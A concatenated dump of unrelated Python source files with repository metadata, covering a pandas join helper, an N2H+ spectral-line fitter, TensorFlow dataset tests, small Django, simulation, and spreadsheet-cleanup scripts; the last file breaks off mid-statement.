if sort_by_appearance:
sorter = np.lexsort((right_index, left_index))
right_index = right_index[sorter]
left_index = left_index[sorter]
sorter = None
if df_columns:
df = _cond_join_select_columns(df_columns, df)
if right_columns:
right = _cond_join_select_columns(right_columns, right)
if set(df.columns).intersection(right.columns):
df, right = _create_multiindex_column(df, right)
if how == _JoinTypes.INNER.value:
df = {
key: extract_array(value, extract_numpy=True)[left_index]
for key, value in df.items()
}
right = {
key: extract_array(value, extract_numpy=True)[right_index]
for key, value in right.items()
}
return pd.DataFrame({**df, **right}, copy=False)
# dirty tests show slight speed gain when copy=False
# which is achievable only within pd.merge
if how == _JoinTypes.LEFT.value:
right = right.loc[right_index]
right.index = left_index
else:
df = df.loc[left_index]
df.index = right_index
df = pd.merge(
df,
right,
left_index=True,
right_index=True,
how=how,
copy=False,
sort=False,
)
df.index = range(len(df))
return df
| 31.086559
| 86
| 0.622561
|
acff8278abc4a903f5005748a2a8cde8749a5cca
| 6,293
|
py
|
Python
|
pyspeckit/spectrum/models/n2hp.py
|
glangsto/pyspeckit
|
346b24fb828d1d33c7891cdde7609723e51af34c
|
[
"MIT"
] | null | null | null |
pyspeckit/spectrum/models/n2hp.py
|
glangsto/pyspeckit
|
346b24fb828d1d33c7891cdde7609723e51af34c
|
[
"MIT"
] | 1
|
2021-05-14T19:17:41.000Z
|
2021-05-14T19:17:41.000Z
|
pyspeckit/spectrum/models/n2hp.py
|
glangsto/pyspeckit
|
346b24fb828d1d33c7891cdde7609723e51af34c
|
[
"MIT"
] | null | null | null |
"""
===========
N2H+ fitter
===========
Reference for line params:
Daniel, F., Dubernet, M.-L., Meuwly, M., Cernicharo, J., Pagani, L. 2005, MNRAS 363, 1083
http://www.strw.leidenuniv.nl/~moldata/N2H+.html
http://adsabs.harvard.edu/abs/2005MNRAS.363.1083D
Does not yet implement: http://adsabs.harvard.edu/abs/2010ApJ...716.1315K
Module API
^^^^^^^^^^
"""
from __future__ import print_function
import numpy as np
import matplotlib.cbook as mpcb
import copy
from astropy.extern.six import iteritems
try:
from astropy.io import fits as pyfits
except ImportError:
import pyfits
try:
import scipy.interpolate
import scipy.ndimage
scipyOK = True
except ImportError:
scipyOK=False
from ...mpfit import mpfit
from .. import units
from . import fitter,model,modelgrid
from . import hyperfine
freq_dict={
'110-011':93.171617e9,
'112-011':93.171913e9,
'112-012':93.171913e9,
'111-010':93.172048e9,
'111-011':93.172048e9,
'111-012':93.172048e9,
'122-011':93.173475e9,
'122-012':93.173475e9,
'123-012':93.173772e9,
'121-010':93.173963e9,
'121-011':93.173963e9,
'121-012':93.173963e9,
'101-010':93.176261e9,
'101-011':93.176261e9,
'101-012':93.176261e9,
}
aval_dict = {
'110-011':3.628,
'112-011':0.907,
'112-012':2.721,
'111-010':1.209,
'111-011':0.907,
'111-012':1.512,
'122-011':2.721,
'122-012':0.907,
'123-012':3.628,
'121-010':2.015,
'121-011':1.512,
'121-012':0.101,
'101-010':0.403,
'101-011':1.209,
'101-012':2.016,
}
line_strength_dict = { # effectively the degeneracy per rotation state...
'110-011':0.333,
'112-011':0.417,
'112-012':1.250,
'111-010':0.333,
'111-011':0.250,
'111-012':0.417,
'122-011':1.250,
'122-012':0.417,
'123-012':2.330,
'121-010':0.556,
'121-011':0.417,
'121-012':0.028,
'101-010':0.111,
'101-011':0.333,
'101-012':0.55,
}
relative_strength_total_degeneracy = {
'110-011':9.0,
'112-011':9.0,
'112-012':9.0,
'111-010':9.0,
'111-011':9.0,
'111-012':9.0,
'122-011':9.0,
'122-012':9.0,
'123-012':9.0,
'121-010':9.0,
'121-011':9.0,
'121-012':9.0,
'101-010':9.0,
'101-011':9.0,
'101-012':9.0,
}
"""
Line strengths of the 15 hyperfine components in J=1-0 transition. The
thickness of the lines indicates their relative weight compared to the others.
Line strengths are normalized in such a way that summing over all initial J = 1
levels gives the degeneracy of the J = 0 levels, i.e., for JF1F 012,
three for JF1F 011, and one for JF1F 010. Thus, the sum over all 15
transitions gives the total spin degeneracy
"""
line_names = tuple(freq_dict.keys())
ckms = units.speedoflight_ms / 1e3 #2.99792458e5
voff_lines_dict = dict([(k,(v-93.176261e9)/93.176261e9*ckms) for k,v in iteritems(freq_dict)])
n2hp_vtau = hyperfine.hyperfinemodel(line_names, voff_lines_dict, freq_dict,
line_strength_dict, relative_strength_total_degeneracy)
n2hp_vtau_fitter = n2hp_vtau.fitter
n2hp_vtau_vheight_fitter = n2hp_vtau.vheight_fitter
def n2hp_radex(xarr,
density=4,
column=13,
xoff_v=0.0,
width=1.0,
grid_vwidth=1.0,
grid_vwidth_scale=False,
texgrid=None,
taugrid=None,
hdr=None,
path_to_texgrid='',
path_to_taugrid='',
temperature_gridnumber=3,
debug=False,
verbose=False,
**kwargs):
"""
Use a grid of RADEX-computed models to make a model line spectrum
The RADEX models have to be available somewhere.
OR they can be passed as arrays. If as arrays, the form should be:
texgrid = ((minfreq1,maxfreq1,texgrid1),(minfreq2,maxfreq2,texgrid2))
xarr must be a SpectroscopicAxis instance
xoff_v, width are both in km/s
grid_vwidth is the velocity assumed when computing the grid in km/s
this is important because tau = modeltau / width (see, e.g.,
Draine 2011 textbook pgs 219-230)
grid_vwidth_scale is True or False: False for LVG, True for Sphere
"""
if texgrid is None and taugrid is None:
if path_to_texgrid == '' or path_to_taugrid=='':
raise IOError("Must specify model grids to use.")
else:
taugrid = [pyfits.getdata(path_to_taugrid)]
texgrid = [pyfits.getdata(path_to_texgrid)]
hdr = pyfits.getheader(path_to_taugrid)
yinds,xinds = np.indices(taugrid[0].shape[1:])
densityarr = (xinds+hdr['CRPIX1']-1)*hdr['CD1_1']+hdr['CRVAL1'] # log density
columnarr = (yinds+hdr['CRPIX2']-1)*hdr['CD2_2']+hdr['CRVAL2'] # log column
minfreq = (4.8,)
maxfreq = (5.0,)
elif len(taugrid)==len(texgrid) and hdr is not None:
minfreq,maxfreq,texgrid = zip(*texgrid)
minfreq,maxfreq,taugrid = zip(*taugrid)
yinds,xinds = np.indices(taugrid[0].shape[1:])
densityarr = (xinds+hdr['CRPIX1']-1)*hdr['CD1_1']+hdr['CRVAL1'] # log density
columnarr = (yinds+hdr['CRPIX2']-1)*hdr['CD2_2']+hdr['CRVAL2'] # log column
else:
raise Exception
# Convert X-units to frequency in GHz
xarr = copy.copy(xarr)
xarr.convert_to_unit('Hz', quiet=True)
tau_nu_cumul = np.zeros(len(xarr))
gridval1 = np.interp(density, densityarr[0,:], xinds[0,:])
gridval2 = np.interp(column, columnarr[:,0], yinds[:,0])
if np.isnan(gridval1) or np.isnan(gridval2):
raise ValueError("Invalid column/density")
if scipyOK:
tau = [scipy.ndimage.map_coordinates(tg[temperature_gridnumber,:,:],np.array([[gridval2],[gridval1]]),order=1) for tg in taugrid]
tex = [scipy.ndimage.map_coordinates(tg[temperature_gridnumber,:,:],np.array([[gridval2],[gridval1]]),order=1) for tg in texgrid]
else:
raise ImportError("Couldn't import scipy, therefore cannot interpolate")
#tau = modelgrid.line_params_2D(gridval1,gridval2,densityarr,columnarr,taugrid[temperature_gridnumber,:,:])
#tex = modelgrid.line_params_2D(gridval1,gridval2,densityarr,columnarr,texgrid[temperature_gridnumber,:,:])
if verbose:
print("density %20.12g column %20.12g: tau %20.12g tex %20.12g" % (density, column, tau, tex))
if debug:
import pdb; pdb.set_trace()
return n2hp_vtau(xarr,Tex=tex,tau=tau,xoff_v=xoff_v,width=width,**kwargs)
| 30.400966
| 137
| 0.652789
|
acff82d11db38f562ad822755b2bdf7c25d70844
| 615
|
py
|
Python
|
fastlvm/__init__.py
|
autonlab/fastlvm
|
05e77da39ca525eacf1a1e3aa2cc551e6cf18dcd
|
[
"MIT"
] | 4
|
2019-08-06T08:59:28.000Z
|
2022-03-21T19:36:48.000Z
|
fastlvm/__init__.py
|
autonlab/fastlvm
|
05e77da39ca525eacf1a1e3aa2cc551e6cf18dcd
|
[
"MIT"
] | 10
|
2019-05-20T20:20:47.000Z
|
2020-06-04T14:33:04.000Z
|
fastlvm/__init__.py
|
autonlab/fastlvm
|
05e77da39ca525eacf1a1e3aa2cc551e6cf18dcd
|
[
"MIT"
] | 2
|
2021-03-18T19:29:03.000Z
|
2022-03-21T13:41:14.000Z
|
from .covertree import CoverTree
from .covertree_classifier import CoverTreeClassifier
from .covertree_regressor import CoverTreeRegressor
from .kmeans import KMeans
from .gmm import GMM
from .lda import LDA
from .hdp import HDP
from .glda import GLDA
from .utils import read_corpus
#__version__ = '0.0.1'
#__author__ = 'CMU'
#__metadata__ = {
# "languages": ["python3.6", "python3.5"],
# "library": "fastlvm",
# "source_code": "https://github.com/manzilzaheer/fastlvm.git",
# "build": [{
# "type": "pip",
# "package": "git+https://github.com/manzilzaheer/fastlvm.git@d3m"
# }],
#
#}
| 25.625
| 73
| 0.689431
|
acff833c12ae018e518ed734f4fa79415a158bed
| 313
|
py
|
Python
|
test/selenium/src/lib/constants/files.py
|
pavelglebov/ggrc-core
|
f99bfdaa11ad30643d7bc9af67bd84436d298cfa
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-01-12T23:46:00.000Z
|
2019-01-12T23:46:00.000Z
|
test/selenium/src/lib/constants/files.py
|
pavelglebov/ggrc-core
|
f99bfdaa11ad30643d7bc9af67bd84436d298cfa
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/selenium/src/lib/constants/files.py
|
pavelglebov/ggrc-core
|
f99bfdaa11ad30643d7bc9af67bd84436d298cfa
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""File's labels and properties."""
class TransformationCSVFields(object):
"""To transformation fields of CSV files."""
# pylint: disable=too-few-public-methods
REVISION_DATE = "Revision Date"
| 31.3
| 78
| 0.734824
|
acff83c239625b03af04f64cd3b43d5c3bc3fa8b
| 10,356
|
py
|
Python
|
tensorflow/contrib/data/python/kernel_tests/dataset_constructor_op_test.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 13
|
2017-02-22T02:20:06.000Z
|
2018-06-06T04:18:03.000Z
|
tensorflow/contrib/data/python/kernel_tests/dataset_constructor_op_test.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/data/python/kernel_tests/dataset_constructor_op_test.py
|
salonirk11/tensorflow
|
7fda1bb1177c69fa7bf80d20d5c5e7aaa25816e7
|
[
"Apache-2.0"
] | 3
|
2017-06-09T10:39:33.000Z
|
2021-04-08T16:13:30.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import nest
class DatasetConstructorTest(test.TestCase):
def testTensorDataset(self):
"""Test an dataset that represents a single tuple of tensors."""
components = [np.array(1), np.array([1, 2, 3]), np.array(37.0)]
iterator = (dataset_ops.Dataset.from_tensors(components)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
sess.run(init_op)
results = sess.run(get_next)
for component, result_component in zip(components, results):
self.assertAllEqual(component, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testTensorSliceDataset(self):
"""Test an dataset that represents the slices from a tuple of tensors."""
components = [
np.tile(np.array([[1], [2], [3], [4]]), 20), np.tile(
np.array([[12], [13], [14], [15]]), 22),
np.array([37.0, 38.0, 39.0, 40.0])
]
iterator = (dataset_ops.Dataset.from_tensor_slices(components)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
sess.run(init_op)
for i in range(4):
results = sess.run(get_next)
for component, result_component in zip(components, results):
self.assertAllEqual(component[i], result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseTensorSliceDataset(self):
"""Test a dataset based on slices of a `tf.SparseTensor`."""
st = array_ops.sparse_placeholder(dtypes.float64)
iterator = (dataset_ops.Dataset.from_sparse_tensor_slices(st)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = sparse_tensor.SparseTensor(*iterator.get_next())
with self.test_session() as sess:
slices = [[1., 2., 3.], [1.], [1.], [1., 2.], [], [1., 2.], [], [], []]
# Test with sparse tensor in the appropriate order.
indices = np.array(
[[i, j] for i in range(len(slices)) for j in range(len(slices[i]))])
values = np.array([val for s in slices for val in s])
dense_shape = np.array([len(slices), max(len(s) for s in slices) + 1])
sparse_feed = sparse_tensor.SparseTensorValue(indices, values,
dense_shape)
sess.run(init_op, feed_dict={st: sparse_feed})
for i, s in enumerate(slices):
results = sess.run(get_next)
self.assertAllEqual(s, results.values)
expected_indices = np.array(
[[j] for j in range(len(slices[i]))]).reshape([-1, 1])
self.assertAllEqual(expected_indices, results.indices)
self.assertAllEqual(dense_shape[1:], results.dense_shape)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test with sparse tensor in the reverse order, which is not
# currently supported.
reverse_order_indices = indices[::-1, :]
reverse_order_values = values[::-1]
sparse_feed = sparse_tensor.SparseTensorValue(
reverse_order_indices, reverse_order_values, dense_shape)
with self.assertRaises(errors.UnimplementedError):
sess.run(init_op, feed_dict={st: sparse_feed})
# Test with an empty sparse tensor.
empty_indices = np.empty((0, 4), dtype=np.int64)
empty_values = np.empty((0,), dtype=np.float64)
empty_dense_shape = [0, 4, 37, 9]
sparse_feed = sparse_tensor.SparseTensorValue(empty_indices, empty_values,
empty_dense_shape)
sess.run(init_op, feed_dict={st: sparse_feed})
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# pylint: disable=g-long-lambda,unnecessary-lambda
def testNestedStructure(self):
components = (np.array([1, 2, 3]), (np.array([4., 5.]), np.array([6., 7.])),
np.array([8, 9, 10]))
dataset = dataset_ops.Dataset.from_tensors(components)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.shuffle(10, 10)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.repeat(-1)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.filter(lambda x, y, z: True)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.take(5)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([3], ([2], [2]), [3]), dataset.output_shapes)
dataset = dataset.map(lambda x, y, z: ((x, z), (y[0], y[1])))
self.assertEquals(((dtypes.int64, dtypes.int64),
(dtypes.float64, dtypes.float64)), dataset.output_types)
self.assertEquals((([3], [3]), ([2], [2])), dataset.output_shapes)
dataset = dataset.flat_map(
lambda x, y: dataset_ops.Dataset.from_tensors(((x[0], x[1]),
(y[0], y[1])))
)
self.assertEquals(((dtypes.int64, dtypes.int64),
(dtypes.float64, dtypes.float64)), dataset.output_types)
self.assertEquals((([3], [3]), ([2], [2])), dataset.output_shapes)
dataset = dataset.batch(32)
self.assertEquals(((dtypes.int64, dtypes.int64),
(dtypes.float64, dtypes.float64)), dataset.output_types)
self.assertEquals((([None, 3], [None, 3]), ([None, 2], [None, 2])),
nest.pack_sequence_as(dataset.output_shapes, [
s.as_list()
for s in nest.flatten(dataset.output_shapes)
]))
iterator = dataset.make_one_shot_iterator()
(w, x), (y, z) = iterator.get_next()
self.assertEquals(dtypes.int64, w.dtype)
self.assertEquals(dtypes.int64, x.dtype)
self.assertEquals(dtypes.float64, y.dtype)
self.assertEquals(dtypes.float64, z.dtype)
self.assertEquals([None, 3], w.shape.as_list())
self.assertEquals([None, 3], x.shape.as_list())
self.assertEquals([None, 2], y.shape.as_list())
self.assertEquals([None, 2], z.shape.as_list())
iterator = dataset.make_initializable_iterator()
(w, x), (y, z) = iterator.get_next()
self.assertEquals(dtypes.int64, w.dtype)
self.assertEquals(dtypes.int64, x.dtype)
self.assertEquals(dtypes.float64, y.dtype)
self.assertEquals(dtypes.float64, z.dtype)
self.assertEquals([None, 3], w.shape.as_list())
self.assertEquals([None, 3], x.shape.as_list())
self.assertEquals([None, 2], y.shape.as_list())
self.assertEquals([None, 2], z.shape.as_list())
# Define a separate set of components with matching leading
# dimension for the from-slices constructor.
components_for_slices = (np.array([1, 2, 3]), (np.array(
[4., 5., 6.]), np.array([7., 8., 9.])), np.array([10, 11, 12]))
dataset = dataset_ops.Dataset.from_tensor_slices(components_for_slices)
self.assertEquals((dtypes.int64, (dtypes.float64, dtypes.float64),
dtypes.int64), dataset.output_types)
self.assertEquals(([], ([], []), []), dataset.output_shapes)
def testNonSequenceNestedStructure(self):
components = np.array([1, 2, 3])
dataset = dataset_ops.Dataset.from_tensors(components)
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([3], dataset.output_shapes)
dataset = dataset.filter(
lambda x: math_ops.reduce_all(math_ops.equal(x, components)))
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([3], dataset.output_shapes)
dataset = dataset.map(lambda x: array_ops.stack([x, x]))
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([2, 3], dataset.output_shapes)
dataset = dataset.flat_map(
lambda x: dataset_ops.Dataset.from_tensor_slices(x))
self.assertEquals(dtypes.int64, dataset.output_types)
self.assertEquals([3], dataset.output_shapes)
iterator = dataset.make_one_shot_iterator()
get_next = iterator.get_next()
self.assertEquals(dtypes.int64, get_next.dtype)
self.assertEquals([3], get_next.shape)
if __name__ == "__main__":
test.main()
| 43.15
| 80
| 0.650058
|
acff85e553d3ccd1d18d5ed436237694884b2974
| 65
|
py
|
Python
|
Hello02.py
|
indraputra147/belajarpython
|
13ed3e73a75f25cc6c2c0e1fc7af17ffa53e5760
|
[
"MIT"
] | null | null | null |
Hello02.py
|
indraputra147/belajarpython
|
13ed3e73a75f25cc6c2c0e1fc7af17ffa53e5760
|
[
"MIT"
] | null | null | null |
Hello02.py
|
indraputra147/belajarpython
|
13ed3e73a75f25cc6c2c0e1fc7af17ffa53e5760
|
[
"MIT"
] | null | null | null |
name = input("Input your name : ")
print("Hello, " + name + "!")
| 21.666667
| 34
| 0.553846
|
acff8615480dc9f5ce4e3a46f2700f7910878135
| 238
|
py
|
Python
|
beproud/django/commons/templatetags/datetime_tags.py
|
beproud/bpcommons
|
c24aed4143d743b1af6c621630ed9faa7e1ccaa4
|
[
"BSD-2-Clause"
] | 2
|
2016-03-07T01:52:12.000Z
|
2017-08-30T06:14:43.000Z
|
beproud/django/commons/templatetags/datetime_tags.py
|
beproud/bpcommons
|
c24aed4143d743b1af6c621630ed9faa7e1ccaa4
|
[
"BSD-2-Clause"
] | 18
|
2015-03-08T13:52:18.000Z
|
2022-01-25T02:46:09.000Z
|
beproud/django/commons/templatetags/datetime_tags.py
|
beproud/bpcommons
|
c24aed4143d743b1af6c621630ed9faa7e1ccaa4
|
[
"BSD-2-Clause"
] | 2
|
2015-02-07T01:33:00.000Z
|
2015-09-08T14:57:44.000Z
|
# vim:fileencoding=utf-8
from django.template import Library
from beproud.django.commons.utils.timeutils import relative_time as rel_time
register = Library()
@register.filter
def relative_time(s):
return rel_time(s) if s else ""
| 19.833333
| 76
| 0.777311
|
acff86558270616b2483226db202b065facfa76f
| 2,104
|
py
|
Python
|
python/tests/app_sim1.py
|
multiscale-cosim/EBRAINS-translators
|
ac48debf85e83674dad4b54aa1daf5419465f805
|
[
"BSD-3-Clause"
] | 1
|
2021-06-11T09:11:33.000Z
|
2021-06-11T09:11:33.000Z
|
python/tests/app_sim1.py
|
multiscale-cosim/EBRAINS-translators
|
ac48debf85e83674dad4b54aa1daf5419465f805
|
[
"BSD-3-Clause"
] | 2
|
2020-07-17T08:34:54.000Z
|
2020-07-17T08:35:31.000Z
|
python/tests/app_sim1.py
|
multiscale-cosim/EBRAINS-translators
|
ac48debf85e83674dad4b54aa1daf5419465f805
|
[
"BSD-3-Clause"
] | 1
|
2021-06-08T07:33:21.000Z
|
2021-06-08T07:33:21.000Z
|
# ------------------------------------------------------------------------------
# Copyright 2020 Forschungszentrum Jülich GmbH
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor
# license agreements; and to You under the Apache License, Version 2.0. "
#
# Forschungszentrum Jülich
# Institute: Institute for Advanced Simulation (IAS)
# Section: Jülich Supercomputing Centre (JSC)
# Division: High Performance Computing in Neuroscience
# Laboratory: Simulation Laboratory Neuroscience
# Team: Multi-scale Simulation and Design
#
# ------------------------------------------------------------------------------
import sys
import placeholders.Simulation_mock as mock
from placeholders.parameter import Parameter
from python.Application_Companion.common_enums import SteeringCommands
from mock_simulator_wrapper import MockWrapper
if __name__ == '__main__':
'''mock for NEST simulation with steering support.'''
# initialize parameters
parameters = Parameter()
# instantiate NEST mock simulator
nest = mock.NestMock(parameters.get_nest_path())
# set direction to the parameter received via Popen subprocess
direction = sys.argv[1] # TODO validate the args
# STEP 1. INIT steering command
# NOTE INIT is a system action and so is done implicitly when initializes
# the simulator
# instantiate the wrapper. and initialize the simulator
simulator_wrapper = MockWrapper(direction, nest)
# STEP 2. START steering command
# receive steering command from Application Manager via (stdin) PIPE
user_action_command = input()
# execute if steering command is START
if SteeringCommands[user_action_command] == SteeringCommands.START:
simulator_wrapper.execute_start_command()
sys.exit(0)
else:
# TODO raise and log the exception with traceback and terminate with
# error if received an unknown steering command
print(f'unknown steering command: '
f'{SteeringCommands[user_action_command]}',
file=sys.stderr)
sys.exit(1)
| 41.254902
| 81
| 0.68251
|
acff8664641307d45554f00d31ef5a16816b81a8
| 1,554
|
py
|
Python
|
api/zeus_api/models/user.py
|
imthaghost/digift
|
6d7582204000190d7f11cbf22a4ecabfbd3c45c4
|
[
"MIT"
] | 7
|
2020-02-19T23:17:59.000Z
|
2021-04-09T08:51:28.000Z
|
api/zeus_api/models/user.py
|
imthaghost/digift
|
6d7582204000190d7f11cbf22a4ecabfbd3c45c4
|
[
"MIT"
] | 2
|
2021-03-31T20:04:31.000Z
|
2021-12-13T20:40:59.000Z
|
FinalProject/api/zeus_api/models/user.py
|
SamuelFolledo/SPD1.3
|
aa28fb738191f315b6627250049db029f8b62585
|
[
"MIT"
] | 3
|
2020-01-28T17:00:59.000Z
|
2020-02-02T07:45:48.000Z
|
"""User Model"""
# built in python modules
# external python modules
import uuid
from bcrypt import hashpw, gensalt
# local python modules
import zeus_api
class User(object):
def __init__(self, full_name, email='None', password='None'):
self.full_name = full_name # users full name
# password is not required because a user can sign up with OAUTH
self.premium = False # intialize premium to false
# user porfolio is a list of companies
self.portfolio = [zeus_api.models.company.Company]
self.uuid = None # initalize no uuid
self.investor_type = None # initialize the investor type to None
self.email = email # email will be the username
self.password = hashpw(password.encode(
'utf-8'), gensalt()) # set password
self.phonenumber = None # user phone number
def set_uuid(self):
self.uuid = str(uuid.uuid4())
def serialize(self):
# serialize user details
return {
"email": self.email,
"uuid": self.uuid,
"password": self.password,
"fullname": self.full_name,
"premium": self.premium,
"investor_type": self.investor_type,
# "portfolio": self.portfolio,
"phonenumber": self.phonenumber
}
def save_new(self):
# todo refactor to make more DRY for all Models
# todo generate a token and sent to users email
# saves new user to database
zeus_api.user.insert_one(self.serialize())
| 33.782609
| 73
| 0.621622
|
acff86b9d3c24f3fa0afa9c4043558f492cfb615
| 3,865
|
py
|
Python
|
mssql_dataframe/package.py
|
jwcook23/mssql_dataframe
|
ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496
|
[
"MIT"
] | null | null | null |
mssql_dataframe/package.py
|
jwcook23/mssql_dataframe
|
ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496
|
[
"MIT"
] | 18
|
2021-08-05T19:29:25.000Z
|
2022-03-02T16:08:08.000Z
|
mssql_dataframe/package.py
|
jwcook23/mssql_dataframe
|
ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496
|
[
"MIT"
] | 1
|
2022-02-08T09:14:56.000Z
|
2022-02-08T09:14:56.000Z
|
"""Classes for all functionality within mssql_dataframe in a convenient package."""
import warnings
from mssql_dataframe.connect import connect
from mssql_dataframe.core import (
custom_warnings,
custom_errors,
conversion,
create,
modify,
read,
)
from mssql_dataframe.core.write.write import write
class SQLServer(connect):
"""Class containing methods for creating, modifying, reading, and writing between dataframes and SQL Server.
If autoadjust_sql_objects is True SQL objects may be modified such as creating a table, adding a column,
or increasing the size of a column. The exception is internal tracking metadata columns _time_insert and
_time_update which will always be created if include_metadata_timestamps=True.
Parameters
----------
database (str, default='master') : name of database to connect to
server (str, default='localhost') : name of server to connect to
driver (str, default=None) : ODBC driver name to use, if not given is automatically determined
username (str, default=None) : if not given, use Windows account credentials to connect
password (str, default=None) : if not given, use Windows account credentials to connect
include_metadata_timestamps (bool, default=False) : include metadata timestamps _time_insert & _time_update in server time for write operations
autoadjust_sql_objects (bool, default=False) : create and modify SQL table and columns as needed if True
Properties
----------
create : methods for creating SQL tables objects
modify : methods for modifying tables columns and primary keys
read : methods for reading from SQL tables
write : methods for inserting, updating, and merging records
Example
-------
#### connect to a local host database, with the ability to automatically adjust SQL objects
sql = SQLServer(autoadjust_sql_objects=True)
#### connect to Azure SQL Server instance
sql = SQLServer(server='<server>.database.windows.net', username='<username>', password='<password>')
"""
def __init__(
self,
database: str = "master",
server: str = "localhost",
driver: str = None,
username: str = None,
password: str = None,
include_metadata_timestamps: bool = False,
autoadjust_sql_objects: bool = False,
):
connect.__init__(self, database, server, driver, username, password)
# initialize mssql_dataframe functionality with shared connection
self.exceptions = custom_errors
self.create = create.create(self.connection, include_metadata_timestamps)
self.modify = modify.modify(self.connection)
self.read = read.read(self.connection)
self.write = write(
self.connection, include_metadata_timestamps, autoadjust_sql_objects
)
# issue warnings for automated functionality
if include_metadata_timestamps:
warnings.warn(
"SQL write operations will include metadata _time_insert & time_update columns as include_metadata_timestamps=True",
custom_warnings.SQLObjectAdjustment,
)
if autoadjust_sql_objects:
warnings.warn(
"SQL objects will be created/modified as needed as autoadjust_sql_objects=True",
custom_warnings.SQLObjectAdjustment,
)
def get_schema(self, table_name: str):
"""Get schema of an SQL table and the defined conversion rules between data types.
Parameters
----------
table_name (str) : table name to read schema from
Returns
-------
schema (pandas.DataFrame) : table column specifications and conversion rules
"""
schema, _ = conversion.get_schema(self.connection, table_name)
return schema
| 38.65
| 147
| 0.689521
|
acff88e6dfc57304e81cb5127d075c062d9066b5
| 335
|
py
|
Python
|
pdf/word_e_excel.py
|
DaviNakamuraCardoso/Projeto-ATMCP
|
ac4bbde04294681091d916e83c20c27be67c623a
|
[
"MIT"
] | null | null | null |
pdf/word_e_excel.py
|
DaviNakamuraCardoso/Projeto-ATMCP
|
ac4bbde04294681091d916e83c20c27be67c623a
|
[
"MIT"
] | null | null | null |
pdf/word_e_excel.py
|
DaviNakamuraCardoso/Projeto-ATMCP
|
ac4bbde04294681091d916e83c20c27be67c623a
|
[
"MIT"
] | null | null | null |
import csv
import docx
file = open('names.csv')
reader = csv.reader(file)
data = list(reader)
word = docx.Document()
for i in range(len(data)):
word.add_paragraph('Melado Productions tem o prazer de convidar')
word.add_paragraph(data[i])
word.add_paragraph('para o 1º Festival Melado de Filmes')
word.save('guests.docx')
| 23.928571
| 69
| 0.722388
|
acff88f6626ef20608ac2bebf2f0d7127336b1d9
| 12,488
|
py
|
Python
|
aalh_iit_rudolphgartnercollection/cleanup-place-column.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_rudolphgartnercollection/cleanup-place-column.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_rudolphgartnercollection/cleanup-place-column.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
from openpyxl import load_workbook
filename = 'aalh_iit_rudolphgartnercollection.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 8
maximumcol = 8
minimumrow = 7
maximumrow = 224
iterationrow = 84
desccol = 8
targetcol = 13
rawcovcol = 49
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
for cell in row:
print(iterationrow)
testvar = ws.cell(row=iterationrow, column=rawcovcol).value
if testvar == None:
ws.cell(row=iterationrow, column=targetcol).value = ''
print('Intentionally left blank')
elif testvar.find('Philadelphia') != -1:
